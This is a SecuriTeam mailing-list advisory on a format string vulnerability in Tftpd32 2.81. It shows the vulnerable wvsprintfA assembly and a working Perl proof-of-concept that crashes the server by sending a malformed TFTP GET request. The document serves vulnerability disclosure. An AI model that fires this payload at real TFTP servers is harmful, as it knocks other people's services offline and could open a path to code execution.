[NT] Tftpd SEND and GET Format String Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Tftpd SEND and GET Format String Vulnerability
------------------------------------------------------------------------


SUMMARY

" <http://tftpd32.jounin.net/> Tftpd32 includes DHCP, TFTP, SNTP and
Syslog servers as well as a TFTP client."

A format string vulnerability in Tftpd32 causes DoS when a malformed SEND
or GET request is received.

DETAILS

Vulnerable Systems:
* Tftpd32 version 2.81

Due to incorrect use of format strings there is a possibility of remote
code execution. You can trigger this vulnerability by sending SEND or GET
request with a specially formated string.

Vulnerable code:
LEA ECX,DWORD PTR SS:[ESP+430]
LEA EAX,DWORD PTR SS:[ESP+1C]
PUSH ECX ; /Arglist
PUSH EDX ; |Format
PUSH EAX ; |s = 00E6F4E8
CALL DWORD PTR DS:[<&USER32.wvsprintfA>] ; \wvsprintfA

Exploit:
#!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research
http://www.critical.lt
use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr =>
$host,Proto=> 'udp');
$bzz = "\x00\x01" ; #GET
$bzz .= "%.1000x\x00";
$bzz .= "\x6F\x63\x74\x65\x74\x00"; #octet
$tftpudp->send($bzz);


ADDITIONAL INFORMATION

The original article can be found at:
<http://www.critical.lt/?vulnerabilities/200>
http://www.critical.lt/?vulnerabilities/200

Related articles:
* <http://www.securiteam.com/windowsntfocus/6D00D2061G.html> TFTPD32
Directory Traversal Vulnerability
* <http://www.securiteam.com/windowsntfocus/6C00C2061A.html> TFTPD32
Buffer Overflow Vulnerability (Long filename)



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages